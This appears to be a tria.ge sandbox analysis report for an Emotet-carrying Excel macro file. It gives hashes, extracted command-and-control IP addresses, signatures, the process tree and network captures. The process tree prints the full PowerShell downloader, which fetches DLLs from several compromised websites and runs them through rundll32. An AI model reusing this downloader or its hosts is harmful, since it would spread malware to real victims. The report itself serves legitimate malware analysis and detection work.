Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

24/11/2021, 17:59 UTC

211124-wk8rgsddbm 10

22/11/2021, 14:46 UTC

211122-r5n6csagd6 10

22/11/2021, 14:46 UTC

211122-r5csbsfgdp 10

22/11/2021, 14:44 UTC

211122-r4kfsafgdn 10

22/11/2021, 14:41 UTC

211122-r2x9vsfgcq 10

22/11/2021, 14:20 UTC

211122-rneklaffgr 10

22/11/2021, 14:15 UTC

211122-rkk8zaffgl 10

17/11/2021, 06:51 UTC

211117-hm1l1aeefm 10

17/11/2021, 06:37 UTC

211117-hdnk3seedn 10

Analysis

  • max time kernel
    27s
  • max time network
    26s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22/11/2021, 14:44 UTC

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2

91.200.186.228:443

191.252.196.221:8080

94.177.248.64:443

66.42.55.5:7080

103.8.26.103:8080

185.184.25.237:8080

103.8.26.102:8080

178.79.147.66:8080

58.227.42.236:80

45.118.135.203:7080

103.75.201.2:443

195.154.133.20:443

45.142.114.231:8080

212.237.5.209:443

207.38.84.195:8080

104.251.214.46:8080

212.237.17.99:8080

212.237.56.116:7080

216.158.226.206:443

110.232.117.186:8080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

    suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\240041168.dll,f1228091526
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\240041168.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:868
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xckwcvpdfqtsymy\tchlvc.htc",LpFnwazG
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1636
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xckwcvpdfqtsymy\tchlvc.htc",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:1584

Network

  • flag-us
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    40.119.148.38
  • flag-us
    DNS
    evgeniys.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    evgeniys.ru
    IN A
    Response
    evgeniys.ru
    IN A
    159.253.18.185
  • flag-ee
    GET
    https://evgeniys.ru/sap-logs/D6/
    powershell.exe
    Remote address:
    159.253.18.185:443
    Request
    GET /sap-logs/D6/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: evgeniys.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.20.1
    Date: Mon, 22 Nov 2021 14:45:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.3
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://evgeniys.ru/wp-json/>; rel="https://api.w.org/"
  • flag-us
    DNS
    crownadvertising.ca
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    crownadvertising.ca
    IN A
    Response
    crownadvertising.ca
    IN A
    209.124.90.7
  • flag-us
    GET
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    powershell.exe
    Remote address:
    209.124.90.7:80
    Request
    GET /wp-includes/OxiAACCoic/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: crownadvertising.ca
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 22 Nov 2021 14:51:30 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Mon, 22 Nov 2021 14:51:31 GMT
    Content-Disposition: attachment; filename="aoSbYZ.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 619bae731beba=1637592691; expires=Mon, 22-Nov-2021 14:52:31 GMT; Max-Age=60; path=/
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Mon, 22 Nov 2021 14:51:31 GMT
    Keep-Alive: timeout=5, max=100
    Transfer-Encoding: chunked
    Content-Type: application/x-msdownload
  • flag-pl
    GET
    https://91.200.186.228/gVVWWhivrlLduheNjiJteqqbVvI
    rundll32.exe
    Remote address:
    91.200.186.228:443
    Request
    GET /gVVWWhivrlLduheNjiJteqqbVvI HTTP/1.1
    Cookie: sK=JK0DyJ+lJesh4UBLO13plyzG7CxmDTUqYYTQSc5Ee2apwR/Nh6YF+xTe3tzCQIbZoTvEhc4hYlrJFSs6MDkb8zKjSKuRkjxtVDfJ+/5EPHlRE28n66ahL7HwC79+QUzvQwuFbRicCCaBJO5A1Vd7dYYrjOKgq2pGEaciPGSlQ9ZtI08Z77/dNvq2EWQqZ2wEP6K+ChoPIRGTGOypGpyvYYn2LJC8zABS9mNK7KmVNmu+cHfRgV2/otCPuutHUeXF6iLBr2bK5yYtmVizonSA7gzVgmJtCymiKNx4pyKFRhbwNcnDl1I6lDn3WwzOrdwFL1QY4Csmx/QCmWKewzl0eJGS+gNmEyVcLxosRKiA2T9OdTRxLcTLbeA=
    Host: 91.200.186.228
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 22 Nov 2021 14:45:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • 159.253.18.185:443
    https://evgeniys.ru/sap-logs/D6/
    tls, http
    powershell.exe
    1.3kB
    29.4kB
    18
    25

    HTTP Request

    GET https://evgeniys.ru/sap-logs/D6/

    HTTP Response

    404
  • 209.124.90.7:80
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    http
    powershell.exe
    4.6kB
    266.7kB
    97
    186

    HTTP Request

    GET http://crownadvertising.ca/wp-includes/OxiAACCoic/

    HTTP Response

    200
  • 91.200.186.228:443
    https://91.200.186.228/gVVWWhivrlLduheNjiJteqqbVvI
    tls, http
    rundll32.exe
    1.2kB
    3.0kB
    10
    9

    HTTP Request

    GET https://91.200.186.228/gVVWWhivrlLduheNjiJteqqbVvI

    HTTP Response

    200
  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
    114 B
    1
    1

    DNS Request

    time.windows.com

    DNS Response

    40.119.148.38

  • 40.119.148.38:123
    time.windows.com
    ntp
    152 B
    2
  • 8.8.8.8:53
    evgeniys.ru
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    evgeniys.ru

    DNS Response

    159.253.18.185

  • 8.8.8.8:53
    crownadvertising.ca
    dns
    powershell.exe
    65 B
    81 B
    1
    1

    DNS Request

    crownadvertising.ca

    DNS Response

    209.124.90.7

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/652-340-0x0000000010000000-0x0000000010028000-memory.dmp

    Filesize

    160KB

  • memory/2772-123-0x00000214D4C90000-0x00000214D4C92000-memory.dmp

    Filesize

    8KB

  • memory/2772-125-0x00000214D4C90000-0x00000214D4C92000-memory.dmp

    Filesize

    8KB

  • memory/2772-124-0x00000214D4C90000-0x00000214D4C92000-memory.dmp

    Filesize

    8KB

  • memory/2772-118-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-122-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-121-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-120-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/2772-119-0x00007FF83D520000-0x00007FF83D530000-memory.dmp

    Filesize

    64KB

  • memory/3504-289-0x000002939D900000-0x000002939D902000-memory.dmp

    Filesize

    8KB

  • memory/3504-290-0x000002939D903000-0x000002939D905000-memory.dmp

    Filesize

    8KB

  • memory/3504-298-0x000002939D906000-0x000002939D908000-memory.dmp

    Filesize

    8KB

  • memory/3504-315-0x000002939D908000-0x000002939D909000-memory.dmp

    Filesize

    4KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.